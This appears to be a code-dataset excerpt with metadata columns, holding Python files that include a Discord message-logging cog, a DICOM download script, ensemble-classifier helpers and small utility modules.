        def msg_check(m):
            # Accept only follow-up messages written by the invoker.
            if m.author.id == ctx.author.id:
                return True
            return False
        try:
            await msg.add_reaction("✅")
            # Wait up to 10s for the owner's confirmation reaction.
            await self.bot.wait_for('raw_reaction_add', timeout=10.0, check=reaction_check_)
            if os.path.isfile(logfolder+str(ctx.guild.id)+".ktx"):
                # A log channel is already configured for this guild
                # (original print: "log file exists").
                print("로그파일 존재")
                try:
                    # NOTE(review): file handles in this method are closed
                    # manually rather than via ``with`` — left untouched in
                    # this documentation-only pass.
                    logf = open(logfolder + str(ctx.guild.id) + ".ktx", "r")
                    # Ask whether the existing channel should be replaced.
                    embed = discord.Embed(title="관리",
                                          description="기존에 설정 되어 있는 " + "<#" + logf.read() + ">" + " 채널을 변경하시겠습니까?",
                                          color=0xeff0f1)
                    embed.set_footer(icon_url=ctx.author.avatar_url,
                                     text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                         datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                    embed.set_thumbnail(url=ctx.guild.icon_url)
                    msg = await ctx.send(embed=embed)
                    logf.close()
                    await msg.add_reaction("✅")
                    await self.bot.wait_for('raw_reaction_add', timeout=10.0, check=reaction_check_)
                    try:
                        await msg.delete()
                        # Prompt for the new channel mention.
                        embed = discord.Embed(title="관리",
                                              description="새로운 채널을 입력해주세요.",
                                              color=0xeff0f1)
                        embed.set_footer(icon_url=ctx.author.avatar_url,
                                         text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                             datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                        embed.set_thumbnail(url=loadingurl)
                        msg = await ctx.send(embed=embed)
                        try:
                            rsg = await self.bot.wait_for('message', timeout=15.0, check=msg_check)
                            # Strip the "<#" prefix and ">" suffix of the
                            # channel mention and persist the bare channel id.
                            logf = open(logfolder + str(ctx.guild.id) + ".ktx", "w")
                            logf.write(rsg.content[2:][:-1])
                            logf.close()
                            # Success: "edit completed".
                            embed = discord.Embed(title="관리", description="수정 완료하였습니다.", color=0xeff0f1)
                            embed.set_footer(icon_url=ctx.author.avatar_url,
                                             text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                                 datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                            embed.set_thumbnail(url=ctx.guild.icon_url)
                            await msg.delete()
                            await ctx.send(embed=embed)
                        except:
                            # Timeout or failure while reading the reply
                            # ("에러 발생!" = "error occurred!").
                            await msg.delete()
                            embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
                            embed.set_footer(icon_url=ctx.author.avatar_url,
                                             text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                                 datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                            embed.set_thumbnail(url=ctx.guild.icon_url)
                            await ctx.send(embed=embed)
                    except:
                        # Failure while showing the "enter new channel" prompt.
                        await msg.delete()
                        embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
                        embed.set_footer(icon_url=ctx.author.avatar_url,
                                         text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                             datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                        embed.set_thumbnail(url=ctx.guild.icon_url)
                        await ctx.send(embed=embed)
                except:
                    # Failure while reading the existing config or waiting for
                    # the replace-confirmation reaction.
                    await msg.delete()
                    embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
                    embed.set_footer(icon_url=ctx.author.avatar_url,
                                     text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                         datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                    embed.set_thumbnail(url=ctx.guild.icon_url)
                    await ctx.send(embed=embed)
            else:
                # No configuration yet: first-time setup of the log channel.
                try:
                    await msg.delete()
                    embed = discord.Embed(title="관리",
                                          description="새로운 채널을 입력해주세요.",
                                          color=0xeff0f1)
                    embed.set_footer(icon_url=ctx.author.avatar_url,
                                     text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                         datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                    embed.set_thumbnail(url=loadingurl)
                    msg = await ctx.send(embed=embed)
                    try:
                        ksg = await self.bot.wait_for('message', timeout=15.0, check=msg_check)
                        await msg.delete()
                        # Strip the channel-mention markers and persist the id.
                        logf = open(logfolder + str(ctx.guild.id) + ".ktx", "w")
                        logf.write(ksg.content[2:][:-1])
                        logf.close()
                        # Success: "logging feature set up".
                        embed = discord.Embed(title="관리", description="로그 기능, 세팅 완료하였습니다!", color=0xeff0f1)
                        embed.set_footer(icon_url=ctx.author.avatar_url,
                                         text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                             datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                        embed.set_thumbnail(url=ctx.guild.icon_url)
                        await ctx.send(embed=embed)
                    except:
                        # Timeout or failure while reading the reply.
                        await msg.delete()
                        embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
                        embed.set_footer(icon_url=ctx.author.avatar_url,
                                         text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                             datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                        embed.set_thumbnail(url=ctx.guild.icon_url)
                        await ctx.send(embed=embed)
                except:
                    # Failure while showing the first-time setup prompt.
                    await msg.delete()
                    embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
                    embed.set_footer(icon_url=ctx.author.avatar_url,
                                     text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                         datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
                    embed.set_thumbnail(url=ctx.guild.icon_url)
                    await ctx.send(embed=embed)
        except:
            # No confirmation within the timeout: report cancellation
            # ("취소되었습니다." = "cancelled").
            await msg.delete()
            embed = discord.Embed(title="관리", description="취소되었습니다.", color=0xeff0f1)
            embed.set_footer(icon_url=ctx.author.avatar_url,
                             text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                 datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
            embed.set_thumbnail(url=ctx.guild.icon_url)
            await ctx.send(embed=embed)

    @commands.Cog.listener()
    async def on_message_delete(self, ctx):
        # ctx is the deleted Message object. Forward a summary embed to the
        # guild's configured log channel, if one is configured.
        if os.path.isfile(logfolder+str(ctx.guild.id)+".ktx"):
            logf = open(logfolder + str(ctx.guild.id) + ".ktx", "r")
            log_channel = logf.read()
            logf.close()
            channel = self.bot.get_channel(int(log_channel))
            embed = discord.Embed(title="Message Deleted", description= "The message sent by <@" + str(ctx.author.id) + "> in <#" + str(ctx.channel.id) + "> was deleted", color=0xeff0f1)
            embed.add_field(name="**Message**", value=str(ctx.content))
            embed.set_footer(icon_url=ctx.author.avatar_url,
                             text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                                 datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
            await channel.send(embed=embed)
        else:
            # No log config for this guild (original print: "no log dir").
            print("로그 dir 없음")

    @commands.Cog.listener()
    async def on_message_edit(self, beforectx, afterctx):
        # beforectx/afterctx are the Message before and after the edit.
        # Forward a before/after embed to the guild's configured log channel.
        if os.path.isfile(logfolder + str(beforectx.guild.id) + ".ktx"):
            logf = open(logfolder + str(beforectx.guild.id) + ".ktx", "r")
            log_channel = logf.read()
            logf.close()
            channel = self.bot.get_channel(int(log_channel))
            embed = discord.Embed(title="Message Edited",
                                  description="<@"+str(beforectx.author.id)+"> edited their message in <#" + str(beforectx.channel.id)+">", color=0xeff0f1)
            embed.add_field(name="**Before**", value=str(beforectx.content))
            embed.add_field(name="**After**", value=str(afterctx.content))
            embed.set_footer(icon_url=beforectx.author.avatar_url,
                             text=beforectx.author.name + "#" + beforectx.author.discriminator + " " + str(
                                 datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
            await channel.send(embed=embed)
        else:
            # No log config for this guild (original print: "no log dir").
            print("로그 dir 없음")
def setup(bot):
    """Entry point used by discord.py extension loading: register the cog."""
    cog = Logger(bot)
    bot.add_cog(cog)
| 51.545024
| 186
| 0.477565
| 1,129
| 10,876
| 4.511072
| 0.144376
| 0.07422
| 0.046731
| 0.060475
| 0.783821
| 0.783821
| 0.749656
| 0.721971
| 0.721971
| 0.71078
| 0
| 0.015399
| 0.390953
| 10,876
| 210
| 187
| 51.790476
| 0.753019
| 0.00616
| 0
| 0.741573
| 0
| 0
| 0.075157
| 0
| 0.005618
| 0
| 0.010367
| 0
| 0
| 1
| 0.022472
| false
| 0
| 0.039326
| 0
| 0.089888
| 0.022472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0dd6f9d531b65d489d97b0f0c5828cf301b534a3
| 360
|
py
|
Python
|
tensor_type/__init__.py
|
sam1902/tensor_type
|
b1120561f8ddf6a29f63578ea0cc49e2d77cdbc8
|
[
"BSD-3-Clause"
] | null | null | null |
tensor_type/__init__.py
|
sam1902/tensor_type
|
b1120561f8ddf6a29f63578ea0cc49e2d77cdbc8
|
[
"BSD-3-Clause"
] | null | null | null |
tensor_type/__init__.py
|
sam1902/tensor_type
|
b1120561f8ddf6a29f63578ea0cc49e2d77cdbc8
|
[
"BSD-3-Clause"
] | null | null | null |
# The package is called tensor_type; the module inside it that defines the
# classes is also called tensor_type.
from tensor_type.tensor_type import Tensor
from tensor_type.tensor_type import Tensor5d
from tensor_type.tensor_type import Tensor4d
from tensor_type.tensor_type import Tensor3d
from tensor_type.tensor_type import Tensor2d
from tensor_type.tensor_type import Tensor1d
| 40
| 56
| 0.866667
| 57
| 360
| 5.22807
| 0.280702
| 0.469799
| 0.281879
| 0.402685
| 0.604027
| 0.604027
| 0
| 0
| 0
| 0
| 0
| 0.015576
| 0.108333
| 360
| 8
| 57
| 45
| 0.912773
| 0.241667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0de8478d0606bdb072125e38c69fef5f39cad481
| 137
|
py
|
Python
|
corehq/apps/translations/integrations/transifex/exceptions.py
|
kkrampa/commcare-hq
|
d64d7cad98b240325ad669ccc7effb07721b4d44
|
[
"BSD-3-Clause"
] | 1
|
2020-05-05T13:10:01.000Z
|
2020-05-05T13:10:01.000Z
|
corehq/apps/translations/integrations/transifex/exceptions.py
|
kkrampa/commcare-hq
|
d64d7cad98b240325ad669ccc7effb07721b4d44
|
[
"BSD-3-Clause"
] | 1
|
2019-12-09T14:00:14.000Z
|
2019-12-09T14:00:14.000Z
|
corehq/apps/translations/integrations/transifex/exceptions.py
|
MaciejChoromanski/commcare-hq
|
fd7f65362d56d73b75a2c20d2afeabbc70876867
|
[
"BSD-3-Clause"
] | 5
|
2015-11-30T13:12:45.000Z
|
2019-07-01T19:27:07.000Z
|
from __future__ import absolute_import
class ResourceMissing(Exception):
    """Raised when a requested resource cannot be found."""
class InvalidProjectMigration(Exception):
    """Raised when a project migration request is not valid."""
| 13.7
| 41
| 0.79562
| 13
| 137
| 8
| 0.692308
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160584
| 137
| 9
| 42
| 15.222222
| 0.904348
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
219e406455f4583fd5a11ae6553e8ccd716a723c
| 2,036
|
py
|
Python
|
datasets/download/download_fatty_seg_images.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/download/download_fatty_seg_images.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/download/download_fatty_seg_images.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
import os
import sys
import pandas as pd
import numpy as np
import fire
sys.path.append(os.path.join(os.path.dirname(__file__), os.path.pardir))
sys.path.append(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
from common.utils.download_utils import download_dcms_with_website
root_dir = '../data/pulmonaryEmbolism/data_batch_1'
def get_series_uids(infile, column_name, outfile):
    '''
    Extract the unique values of one CSV column (the series UIDs) and write
    them, newline separated, to outfile.

    :param infile: path to the annotation .csv file
    :param column_name: name of the column holding the series UIDs
        (e.g. '序列编号')
    :param outfile: path of the text file to write, one UID per line
    :return: sorted list of unique series UIDs

    invoke cmd: python download_pulmonary_embolism_images.py get_series_uids '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.csv' '序列编号' '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.txt'
    invoke cmd: python download_pulmonary_embolism_images.py get_series_uids '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.csv' '序列编号' '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.txt'
    '''
    df = pd.read_csv(infile)
    # Fix: sort the de-duplicated UIDs so the returned list and the written
    # file are deterministic (plain set iteration order is not guaranteed).
    series_uids = sorted(set(df[column_name].tolist()))
    with open(outfile, 'w') as f:
        f.write('\n'.join(series_uids))
    return series_uids
def download_images(out_path, config_file):
    '''
    Download the DICOM series listed in config_file into out_path.

    :param out_path: destination directory for the downloaded DICOM files
    :param config_file: spreadsheet describing the files to fetch
        (e.g. the exported internal-address .xlsx)

    invoke cmd: python download_pulmonary_embolism_images.py download_images '../data/pulmonaryEmbolism/data_batch_1/images' '../data/pulmonaryEmbolism/data_batch_1/文件内网地址信息-导出结果.xlsx'
    '''
    download_dcms_with_website(out_path, config_file)
if __name__ == '__main__':
    # python-fire exposes every top-level function of this module as a CLI
    # sub-command, e.g. ``python <script> get_series_uids <csv> <col> <txt>``.
    fire.Fire()
# Example invocations kept for reference:
# get_series_uids('../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.csv', '序列编号', '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.txt')
# get_series_uids('../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.csv', '序列编号', '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.txt')
| 49.658537
| 215
| 0.780452
| 300
| 2,036
| 4.88
| 0.23
| 0.215164
| 0.256148
| 0.307377
| 0.728825
| 0.70765
| 0.657104
| 0.657104
| 0.624317
| 0.624317
| 0
| 0.033962
| 0.0889
| 2,036
| 41
| 216
| 49.658537
| 0.755256
| 0.608055
| 0
| 0
| 0
| 0
| 0.064901
| 0.050331
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.315789
| 0
| 0.473684
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
21cc4cc4895db768bf883da4a5bc6c48b7b9b920
| 26
|
py
|
Python
|
esl/law/__init__.py
|
rht/ESL
|
f883155a167d3c48e5ecdca91c8302fefc901c22
|
[
"Apache-2.0"
] | null | null | null |
esl/law/__init__.py
|
rht/ESL
|
f883155a167d3c48e5ecdca91c8302fefc901c22
|
[
"Apache-2.0"
] | null | null | null |
esl/law/__init__.py
|
rht/ESL
|
f883155a167d3c48e5ecdca91c8302fefc901c22
|
[
"Apache-2.0"
] | 1
|
2021-01-27T12:11:48.000Z
|
2021-01-27T12:11:48.000Z
|
from esl.law._law import *
| 26
| 26
| 0.769231
| 5
| 26
| 3.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1d0d011e8f55d4df74ad4fed1b146b7d6ee3e98b
| 8,049
|
py
|
Python
|
ensemble_models.py
|
SeyVu/subscription_renewal
|
9f4ba491ddd3ea1c2c5ce772ae3260a0daf4cbac
|
[
"MIT"
] | null | null | null |
ensemble_models.py
|
SeyVu/subscription_renewal
|
9f4ba491ddd3ea1c2c5ce772ae3260a0daf4cbac
|
[
"MIT"
] | null | null | null |
ensemble_models.py
|
SeyVu/subscription_renewal
|
9f4ba491ddd3ea1c2c5ce772ae3260a0daf4cbac
|
[
"MIT"
] | null | null | null |
#########################################################################################################
# Description: Functions to create ensembles of classification models.
#
#########################################################################################################
from __future__ import division # Used in matplotlib
# sklearn Toolkit
from sklearn.metrics import precision_recall_fscore_support
import numpy as np
import support_functions as sf
import baseline_models
import logging
import logging.config
#########################################################################################################
# Global variables
__author__ = "DataCentric1"
# Module-wide pass/fail return codes used by callers.
__pass__ = 1
__fail__ = 0
#########################################################################################################
# Setup logging: configuration is read from logging.conf; the "info" logger is used module-wide.
logging.config.fileConfig('logging.conf')
logger = logging.getLogger("info")
#########################################################################################################
# Use majority voting to predict classes of new ensemble. For even number of models, split = majority!
def majority_voting(input_features, output, model_names, model_parameters, run_cv_flag=False, num_model_iterations=1,
                    plot_learning_curve=False, run_prob_predictions=True, classification_threshold=0.5):
    """Build an ensemble prediction by majority vote over per-model class labels.

    Each model in model_names is run through baseline_models.run_models_wrapper;
    a sample is classified 1 when at least half of the models (rounded up) vote 1.
    For an even number of models an exact split therefore counts as a majority.

    :param input_features: feature matrix passed to each model (x)
    :param output: ground-truth labels (y)
    :param model_names: dict keyed 'model0', 'model1', ... of classifier classes
    :param model_parameters: dict with the same keys holding per-model kwargs
    :param run_cv_flag: forwarded to the model wrapper (cross-validation toggle)
    :param num_model_iterations: forwarded to the model wrapper
    :param plot_learning_curve: forwarded to the model wrapper
    :param run_prob_predictions: forwarded to the model wrapper
    :param classification_threshold: forwarded to the model wrapper
    :return: precision/recall/fbeta tuple from precision_recall_fscore_support
        (beta=2) for the ensemble prediction

    NOTE(review): dict.iterkeys() below is Python 2 only; this module appears
    to target Python 2 (see the __future__ division import at file top).
    """
    # Require at least 2 models to form an ensemble.
    if len(model_names) < 2:
        raise ValueError("Need a minimum of 2 models to do an ensemble")
    actual_output_values = dict()
    predicted_output_values = dict()
    num_of_models = len(model_names)
    # Get actual and predicted values for each model
    for idx in range(num_of_models):
        model_key = "model{:d}".format(idx)
        logger.info(sf.Color.BOLD + sf.Color.GREEN + "\nRunning Model {:s}".format(model_names[model_key]) +
                    sf.Color.END)
        # Append to dictionary with dynamically created key names above
        [actual_output_values[model_key], predicted_output_values[model_key]] = \
            baseline_models.run_models_wrapper(x=input_features, y=output, run_cv_flag=run_cv_flag,
                                               num_model_iterations=num_model_iterations,
                                               plot_learning_curve=plot_learning_curve,
                                               run_prob_predictions=run_prob_predictions,
                                               classification_threshold=classification_threshold,
                                               clf_class=model_names[model_key], **model_parameters[model_key])
    # accuracy(actual_output_values[actual_output_name], predicted_output_values[predicted_output_name])
    # Start from model0's predictions so the ensemble array has the right shape/dtype.
    y_predicted_ensemble = predicted_output_values['model0'].copy()
    # # Create ensemble prediction using majority voting scheme
    for sample in np.ndindex(predicted_output_values['model0'].shape):
        y_predicted_sum = 0  # Reset for every sample
        # Count, across all models, how many predicted class 1 for this sample
        # (the key sets of both dicts are identical by construction).
        for actual_key_name in actual_output_values.iterkeys():
            if predicted_output_values[actual_key_name][sample]:
                y_predicted_sum += 1
        # Need to have either numerator or denominator in round() as float to roundup
        if y_predicted_sum >= round(num_of_models / 2.0):
            y_predicted_ensemble[sample] = 1
        else:
            y_predicted_ensemble[sample] = 0
    accuracy_value = baseline_models.accuracy(actual_output_values['model0'], y_predicted_ensemble)
    # beta=2 weights recall higher than precision in the F-score.
    beta = 2.0
    prec_recall = precision_recall_fscore_support(y_true=actual_output_values['model0'], y_pred=y_predicted_ensemble,
                                                  beta=beta, average='binary')
    # Log Accuracy and precision / recall values for the ensemble
    logger.info(sf.Color.BOLD + sf.Color.DARKCYAN + "\nEnsemble output for test data" + sf.Color.END)
    logger.info(
        sf.Color.BOLD + sf.Color.DARKCYAN + "\nAccuracy {:.2f}".format(accuracy_value * 100) +
        sf.Color.END)
    logger.info(
        sf.Color.BOLD + sf.Color.DARKCYAN + "\nPrecision {:.2f} Recall {:.2f} Fbeta-score {:.2f}".format(
            prec_recall[0] * 100, prec_recall[1] * 100, prec_recall[2] * 100) + sf.Color.END)
    # Returns precision / recall for the ensemble at the given classification threshold
    return prec_recall
# Use predicted probabilities from models instead of classification. Force return_yprob=True for model to
# return prediction probabilities
def average_prob(input_features, output, model_names, model_parameters, run_cv_flag=False, num_model_iterations=1,
                 plot_learning_curve=False, run_prob_predictions=True, classification_threshold=0.5):
    """Ensemble prediction by averaging per-model predicted probabilities.

    Runs every model in ``model_names`` through
    ``baseline_models.run_models_wrapper`` with ``return_yprob=True`` so each
    model returns prediction probabilities instead of hard classifications.
    For each sample the probabilities are averaged across the models and the
    sample is classified 1 when the averaged probability is strictly greater
    than ``classification_threshold``, else 0.

    :param input_features: feature matrix forwarded to each model as ``x``
    :param output: target vector forwarded to each model as ``y``
    :param model_names: dict mapping keys "model0", "model1", ... to classifier classes
    :param model_parameters: dict mapping the same keys to kwargs for each classifier
    :param run_cv_flag: forwarded to ``run_models_wrapper``
    :param num_model_iterations: forwarded to ``run_models_wrapper``
    :param plot_learning_curve: forwarded to ``run_models_wrapper``
    :param run_prob_predictions: forwarded to ``run_models_wrapper``
    :param classification_threshold: averaged probability above which a sample is class 1
    :return: ``(precision, recall, fbeta_score, support)`` from sklearn's
        ``precision_recall_fscore_support`` (binary average, beta=2) for the ensemble
    :raises ValueError: if fewer than 2 models are supplied
    """
    # Averaging only makes sense across at least two models
    if len(model_names) < 2:
        raise ValueError("Need a minimum of 2 models to do an ensemble")
    actual_output_values = dict()
    predicted_output_values = dict()
    num_of_models = len(model_names)
    # Get actual values and predicted probabilities for each model
    for idx in range(num_of_models):
        model_key = "model{:d}".format(idx)
        logger.info(sf.Color.BOLD + sf.Color.GREEN + "\nRunning Model {:s}".format(model_names[model_key]) +
                    sf.Color.END)
        # Append to dictionary with dynamically created key names above
        [actual_output_values[model_key], predicted_output_values[model_key]] = \
            baseline_models.run_models_wrapper(x=input_features, y=output, run_cv_flag=run_cv_flag,
                                               num_model_iterations=num_model_iterations,
                                               plot_learning_curve=plot_learning_curve,
                                               run_prob_predictions=run_prob_predictions, return_yprob=True,
                                               classification_threshold=classification_threshold,
                                               clf_class=model_names[model_key], **model_parameters[model_key])
    y_predicted_ensemble = actual_output_values['model0'].copy()
    y_predicted_prob = np.zeros(len(actual_output_values['model0']), dtype=float)
    # Create ensemble probability by averaging output probabilities from each
    # model, then apply the classification threshold on the averaged probability
    for sample in np.ndindex(predicted_output_values['model0'].shape):
        # Plain dict iteration instead of Python-2-only iterkeys(); equivalent on both 2 and 3
        for model_key_name in predicted_output_values:
            # Sum probabilities for each sample from the different models
            y_predicted_prob[sample] += predicted_output_values[model_key_name][sample]
        # Average probability
        y_predicted_prob[sample] /= num_of_models
        # Strict > keeps samples exactly at the threshold in class 0
        if y_predicted_prob[sample] > classification_threshold:
            y_predicted_ensemble[sample] = 1
        else:
            y_predicted_ensemble[sample] = 0
    accuracy_value = baseline_models.accuracy(actual_output_values['model0'], y_predicted_ensemble)
    beta = 2.0
    prec_recall = precision_recall_fscore_support(y_true=actual_output_values['model0'], y_pred=y_predicted_ensemble,
                                                  beta=beta, average='binary')
    # Log Accuracy and precision / recall values for the ensemble
    logger.info(sf.Color.BOLD + sf.Color.DARKCYAN + "\nEnsemble output for test data" + sf.Color.END)
    logger.info(
        sf.Color.BOLD + sf.Color.DARKCYAN + "\nAccuracy {:.2f}".format(accuracy_value * 100) +
        sf.Color.END)
    logger.info(
        sf.Color.BOLD + sf.Color.DARKCYAN + "\nPrecision {:.2f} Recall {:.2f} Fbeta-score {:.2f}".format(
            prec_recall[0] * 100, prec_recall[1] * 100, prec_recall[2] * 100) + sf.Color.END)
    # Returns precision / recall for the ensemble at the given classification threshold
    return prec_recall
##################################################################################################################
| 48.781818
| 117
| 0.619332
| 922
| 8,049
| 5.137744
| 0.191974
| 0.035465
| 0.049398
| 0.02871
| 0.745197
| 0.729576
| 0.729576
| 0.712687
| 0.712687
| 0.69411
| 0
| 0.011891
| 0.22686
| 8,049
| 164
| 118
| 49.079268
| 0.749317
| 0.192943
| 0
| 0.717391
| 0
| 0
| 0.075232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0.01087
| 0.076087
| 0
| 0.119565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
df4809c38aaf328499929b2ee7d7407ebc573ea2
| 40
|
py
|
Python
|
sale.py
|
SRtsuki/SELab02
|
33a3728e2141838f3c797c1df40b1aa1758f23fd
|
[
"MIT"
] | null | null | null |
sale.py
|
SRtsuki/SELab02
|
33a3728e2141838f3c797c1df40b1aa1758f23fd
|
[
"MIT"
] | null | null | null |
sale.py
|
SRtsuki/SELab02
|
33a3728e2141838f3c797c1df40b1aa1758f23fd
|
[
"MIT"
] | null | null | null |
# sale.py
print("This is a test file.")
| 13.333333
| 29
| 0.65
| 8
| 40
| 3.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175
| 40
| 2
| 30
| 20
| 0.787879
| 0.175
| 0
| 0
| 0
| 0
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.